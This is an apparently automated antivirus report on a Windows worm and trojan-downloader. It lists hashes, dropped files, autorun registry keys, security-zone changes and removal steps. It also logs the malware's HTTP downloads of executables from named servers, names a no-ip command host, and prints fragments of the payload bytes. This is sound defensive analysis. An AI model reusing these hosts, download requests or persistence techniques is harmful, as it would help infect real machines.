Trojan-Downloader.Win32.Genome.gtff (Kaspersky), Trojan.Win32.IEDummy.FD, WormRebhip.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, Worm, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: d04fe3b872d85220f0292ad2a0ce0257
SHA1: bc217aea57448d4520b5df460379bc9c885cf0aa
SHA256: 55da8bae46634d196e0d2d2e31e58dab38a294828ac8045e8c81459d67f63d46
SSDeep: 49152:py/YWWDaolr sAjHk4tI/viP3TL5HNlZLqBIOggPwH CB:kFWplrUY0ZDL7hh8wf
Size: 2449408 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: Sysinnals - www.sysinternals.com
Created at: 2014-04-30 13:07:04
Analyzed on: WindowsXP SP3 32-bit
Summary: Worm. A program that is primarily replicating on networks or removable drives.
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Worm creates the following process(es):
server.exe:616
musicmakersystem.exe:3188
The Worm injects its code into the following process(es):
iexplore.exe:396
%original file name%.exe:1912
File activity
The process server.exe:616 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%WinDir%\install\musicmakersystem.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XX--XX--XX.txt (3676 bytes)
The process iexplore.exe:396 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\XxX.xXx (3320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\UuU.uUu (16 bytes)
%Documents and Settings%\%current user%\Application Data\logs.dat (15 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\UuU.uUu (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XxX.xXx (0 bytes)
C:\Temp\server.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XX--XX--XX.txt (0 bytes)
The process %original file name%.exe:1912 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\opera[1].exe (1655 bytes)
C:\Temp\ln.jpg (120 bytes)
C:\Temp\server.exe (147458 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\server[1].exe (154269 bytes)
Registry activity
The process server.exe:616 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 B8 5D B0 0F 9D 91 D7 30 58 7F A6 58 2D 48 27"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{08B0E5JF-4FCB-11CF-AAA5-00401C6XX500}]
"StubPath" = "%WinDir%\install\musicmakersystem.exe Restart"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"Policies" = "%WinDir%\install\musicmakersystem.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"Policies" = "%WinDir%\install\musicmakersystem.exe"
To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"HKCU" = "%WinDir%\install\musicmakersystem.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"HKLM" = "%WinDir%\install\musicmakersystem.exe"
The process iexplore.exe:396 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 DA 46 44 E0 00 C6 07 D0 10 3D 6B 87 57 AD 28"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%\install]
"musicmakersystem.exe" = "musicmakersystem"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\vÃÂÂtima]
"NewIdentification" = "vÃÂÂtima"
"FirstExecution" = "09/05/2014 -- 22:35"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process musicmakersystem.exe:3188 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 81 BE B0 05 BB 05 2B 7F 94 0C F2 54 6C E4 5F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process %original file name%.exe:1912 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 5A 82 7B CB 1F 60 6B 7E 97 B3 A5 19 5E 6C 94"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 72cdafc4dba2ad59c23ea641c9c8e181 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\server[1].exe |
| 72cdafc4dba2ad59c23ea641c9c8e181 | c:\WINDOWS\install\musicmakersystem.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
server.exe:616
musicmakersystem.exe:3188 - Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
%WinDir%\install\musicmakersystem.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XX--XX--XX.txt (3676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XxX.xXx (3320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\UuU.uUu (16 bytes)
%Documents and Settings%\%current user%\Application Data\logs.dat (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\opera[1].exe (1655 bytes)
C:\Temp\ln.jpg (120 bytes)
C:\Temp\server.exe (147458 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\server[1].exe (154269 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"HKCU" = "%WinDir%\install\musicmakersystem.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"HKLM" = "%WinDir%\install\musicmakersystem.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.0.0
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments:
Language: English (United States)
Company Name: Product Name: Product Version: 1.0.0.0Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: Comments: Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 1683456 | 525824 | 5.54489 | b3f5a2b082752b77b47300083a32d13a |
| .itext | 1687552 | 8192 | 3584 | 5.41016 | ff17b643765d2b22cdde5bb79e8ead9c |
| .data | 1695744 | 53248 | 21504 | 5.51734 | 3be9ebc8093c3e30d7312d9e541b2939 |
| .bss | 1748992 | 552960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .idata | 2301952 | 16384 | 4608 | 5.44491 | e9d5c739878dbf28bb9c262bed85ad33 |
| .didata | 2318336 | 4096 | 1024 | 4.7134 | d1eb9b0c903b3075fea415b65ea6bddd |
| .tls | 2322432 | 4096 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rdata | 2326528 | 4096 | 512 | 0.146134 | cd28fcbdf8b8ddec9941cd1ef59c32df |
| .reloc | 2330624 | 147456 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 2478080 | 528384 | 75264 | 5.43792 | dd8d47b94fed6a4bf4fc26f20dd15949 |
| .debug | 3006464 | 7442432 | 1512448 | 5.54344 | 4ed7f01a00940c37b9671f7b0c9972b3 |
| .aspack | 10448896 | 307200 | 303616 | 3.79947 | ff6b36bb725dcb4444ada0ec736d2bd1 |
| .adata | 10756096 | 4096 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://www.cimsatas.com/test/server.exe | 212.252.45.201 |
| hxxp://www.cimsatas.com/test/opera.exe | 212.252.45.201 |
| ihateyou.no-ip.biz | 82.222.210.16 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /test/server.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cimsatas.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 09 Apr 2014 13:09:29 GMT
Accept-Ranges: bytes
ETag: "fabee7f0f453cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 09 May 2014 19:36:56 GMT
Content-Length: 483840
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................P.......`.......p........@..............................................@..............................t...................................................................................................................UPX0.....`..............................UPX1.....P...p...P..................@....rsrc................T..............@..............................................................................................................................................................................................................................................................................................................................................................................3.00.UPX!....K.....W......M...&..&.........@...Byte......&..St....ringl..?......\.h.lpd@..{..\...TObject.%..A..NNN......NNNN..|xNNNNtplhNNNNd.`\NNNNX...l._NTP.<.z........Nx..S..S-...3............*.[.RPCw.3|3...t..64....s.dk....HDu.........t2..t.P..@H....Yr..G..1s...{..b...c...p...... ....SV...........=........d.-.....u.J#.........w.3.........L..ZB..^.....N...$.......}.g.W....9.t.W....w..t1..|9.....,0:<.."tw ...:08............).)....I...x..7x7k..0>_^..Us..S............< v..;"u[.....{........3....C<.1W..?ij.. ...wB...X.v..M.w.....
<<
<<< skipped >>>
GET /test/opera.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cimsatas.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 30 Apr 2014 10:09:54 GMT
Accept-Ranges: bytes
ETag: "326919555c64cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 09 May 2014 19:36:59 GMT
Content-Length: 2449408
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...H.`S....................\.|......p............@..........................0...................@..............................4.....%...............................-..............................................................................text...............................`....itext... ..........................`....data............T..................@....bss.....p...........l..............@....idata...@... #......l..............@....didata......`#......~..............@....tls.........p#.....................@....rdata........#.....................@....reloc...@....#.....................@....rsrc.........%..&..................@....debug....q...-.....................@....aspack......p........ .............`....adata....... .......`%.............@... .......4?....d...".....D....",..{..g....a ...7H.!%..<|v.yk....v.n\r.yJ.OV.z.=.@...H)T.*..&..wd.H.........c{.....r.y.....)......*.....0V.l....$}rB.......H.r.. .y.o{.o9....s9...}.......>....|.....H .1.....M..(...Xp.....L.........'Y...p.X.=i..]..._.v.x..>G.$.?.:.pP.L.%...E@m5..~...5f-..ayO../....\.@O,...|...]7..;u .id..|8..E..).1Y0.......E..8].R.66A.3[.. t{.u..TG.U....>.l.aH..2...q....y\.H....|p..E$.Z....M.r.j.p.:.!6Az?rYvXi-...r....Me.f\... .(R%...|p]b"O...R...{..KG#..QBG/.iY4...L=;.B80lu...~2...
<<
<<< skipped >>>
Map
The Worm connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1912_rwx_00DF7000_00002000:
kernel32.dll
kernel32.dll
user32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
msimg32.dll
msimg32.dll
gdi32.dll
gdi32.dll
version.dll
version.dll
ole32.dll
ole32.dll
comctl32.dll
comctl32.dll
msvcrt.dll
msvcrt.dll
shell32.dll
shell32.dll
urlmon.dll
urlmon.dll
winspool.drv
winspool.drv
RegUnLoadKeyW
RegUnLoadKeyW
URLDownloadToFileW
URLDownloadToFileW
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel><pre>1.0.0.0</pre><b>iexplore.exe_396:</b><pre>%?9-*09,*19}*09</pre><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>msvcrt.dll</pre><pre>KERNEL32.dll</pre><pre>NTDLL.DLL</pre><pre>USER32.dll</pre><pre>SHLWAPI.dll</pre><pre>SHDOCVW.dll</pre><pre>Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess</pre><pre>IE-X-X</pre><pre>rsabase.dll</pre><pre>System\CurrentControlSet\Control\Windows</pre><pre>dw15 -x -s %u</pre><pre>watson.microsoft.com</pre><pre>IEWatsonURL</pre><pre>%s -h %u</pre><pre>iedw.exe</pre><pre>Iexplore.XPExceptionFilter</pre><pre>jscript.DLL</pre><pre>mshtml.dll</pre><pre>mlang.dll</pre><pre>urlmon.dll</pre><pre>wininet.dll</pre><pre>shdocvw.DLL</pre><pre>browseui.DLL</pre><pre>comctl32.DLL</pre><pre>IEXPLORE.EXE</pre><pre>iexplore.pdb</pre><pre>ADVAPI32.dll</pre><pre>MsgWaitForMultipleObjects</pre><pre>IExplorer.EXE</pre><pre>IIIIIB(II<.Fg</pre><pre>7?_____ZZSSH%</pre><pre>)z.UUUUUUUU</pre><pre>,....Qym</pre><pre>````2```</pre><pre>{.QLQIIIKGKGKGKGKGKG</pre><pre>;33;33;0</pre><pre>8888880</pre><pre>8887080</pre><pre>browseui.dll</pre><pre>shdocvw.dll</pre><pre>6.00.2900.5512 (xpsp.080413-2105)</pre><pre>Windows</pre><pre>Operating System</pre><pre>6.00.2900.5512</pre><b>iexplore.exe_396_rwx_00150000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00290000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_002D0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00310000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00350000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00390000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00C50000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00C90000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00CD0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00D10000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00D50000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00D90000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00DD0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00E10000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00E50000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00E90000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00ED0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00F10000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00F50000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00F90000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_00FD0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01010000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01050000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01090000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_010D0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01110000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01150000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01190000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_011D0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01210000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01250000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01290000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_012D0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01310000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01350000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01390000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_013D0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01410000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01450000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01490000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_014D0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01510000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01550000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01590000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_015C0000_00001000:</b><pre>GetProcessHeap</pre><b>iexplore.exe_396_rwx_015D0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_01600000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_01740000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_01780000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_017B0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_018F0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01920000_00001000:</b><pre>RegOpenKeyExA</pre><b>iexplore.exe_396_rwx_01930000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01960000_00001000:</b><pre>RegCloseKey</pre><b>iexplore.exe_396_rwx_01970000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_019A0000_00001000:</b><pre>oleaut32.dll</pre><b>iexplore.exe_396_rwx_01AE0000_00001000:</b><pre>oleaut32.dll</pre><b>iexplore.exe_396_rwx_01B20000_00001000:</b><pre>oleaut32.dll</pre><b>iexplore.exe_396_rwx_01B60000_00001000:</b><pre>oleaut32.dll</pre><b>iexplore.exe_396_rwx_01B90000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01CD0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01D10000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01D40000_00001000:</b><pre>RegOpenKeyExA</pre><b>iexplore.exe_396_rwx_01D50000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01D80000_00001000:</b><pre>RegOpenKeyA</pre><b>iexplore.exe_396_rwx_01D90000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01DD0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01E00000_00001000:</b><pre>RegEnumKeyExA</pre><b>iexplore.exe_396_rwx_01E10000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01E50000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01E80000_00001000:</b><pre>RegDeleteKeyA</pre><b>iexplore.exe_396_rwx_01E90000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01EC0000_00001000:</b><pre>RegCreateKeyA</pre><b>iexplore.exe_396_rwx_01ED0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01F00000_00001000:</b><pre>RegCloseKey</pre><b>iexplore.exe_396_rwx_01F10000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01F50000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01F90000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_01FD0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_02010000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_02040000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02180000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_021C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02200000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02240000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02270000_00001000:</b><pre>WinExec</pre><b>iexplore.exe_396_rwx_02280000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_022C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02300000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02340000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02380000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_023C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02400000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02440000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02480000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_024C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02500000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02540000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02580000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_025C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_025F0000_00001000:</b><pre>SetNamedPipeHandleState</pre><b>iexplore.exe_396_rwx_02600000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02640000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02680000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_026C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02700000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02740000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02780000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_027C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02800000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02840000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02880000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_028C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02900000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02940000_00001